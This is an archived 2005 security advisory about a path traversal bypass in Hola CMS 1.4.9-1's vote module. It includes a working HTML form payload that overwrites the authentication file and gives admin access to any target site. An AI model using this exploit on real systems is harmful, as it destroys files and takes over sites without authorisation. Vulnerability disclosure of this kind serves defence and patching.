Virginity Security Advisory 2005-002 : Hola CMS - Another File destruction and System access

2005-03-16T00:00:00
ID SECURITYVULNS:DOC:8073
Type securityvulns
Reporter Securityvulns
Modified 2005-03-16T00:00:00

Description


Virginity Security Advisory 2005-002


         DATE : 2005-03-13 15:11 GMT
         TYPE : remote

VERSIONS AFFECTED : hola-cms-1.4.9-1 (http://holacms.drunkencat.net/) AUTHOR : Virginity ADVISORY NUMBER : 004


Description:

Like the one in SA-2005-001: A new patched version 1.4.9-1 got released where that issue was marked as solved. The Vote-Module(vote_save_results.php) now checks with strpos() wether the submitted "vote_filename" variable contains "holaDB/votes" at position 0.

BUT! Since we all know how to change directories by typing ../ we can still manipluate or destroy every file on the whole server by simply doing "vote_filename=holaDB/votes/../../[anything we want]"!!! Below the updated example how to destroy login-authentification file and gaining access to admin-functions!

Really sad that the quick patch (released 3? hours after notifcation) doesn't really work.

Author of the Software has been notified.


Example:

Create this html form (that makes it easier to use it on multiple targets):

<form action="http://[target]/[site-with-vote].php?vote=1" method="POST"> <input type="hidden" name="vote_filename" value="holaDB/votes/../../admin/multiuser/multiuser.php"> <input type="hidden" name="result" value="0"> <input type="submit" value="Stimme abgeben" name="button"> </form>

Of course you'll have to edit [target] and [site-with-vote] to match your site! Now when you push the button the first lines of the multiuser.php (which includes the authentication mechanism) get overwritten and by calling http://[target]/admin/index_cms.php you have access to all user functions. by calling http://[target]/admin/[module you want].php?username=siteadmin to all siteadmin functions!


Solution:

Use other CMS... i think PHP-Nuke isn't that vulnerable ;)


Personal note:

YES! The girl did it again :) Contact me on IRC!